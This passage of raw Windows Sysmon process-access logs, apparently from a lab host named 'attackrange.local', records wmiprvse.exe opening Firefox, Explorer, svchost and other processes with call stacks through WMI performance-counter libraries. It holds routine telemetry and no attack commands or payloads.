Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150661Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150660Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150659Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150658Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150657Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150656Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150655Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150654Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150653Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150652Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150651Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150650Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150649Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150648Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150647Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.350{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150646Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 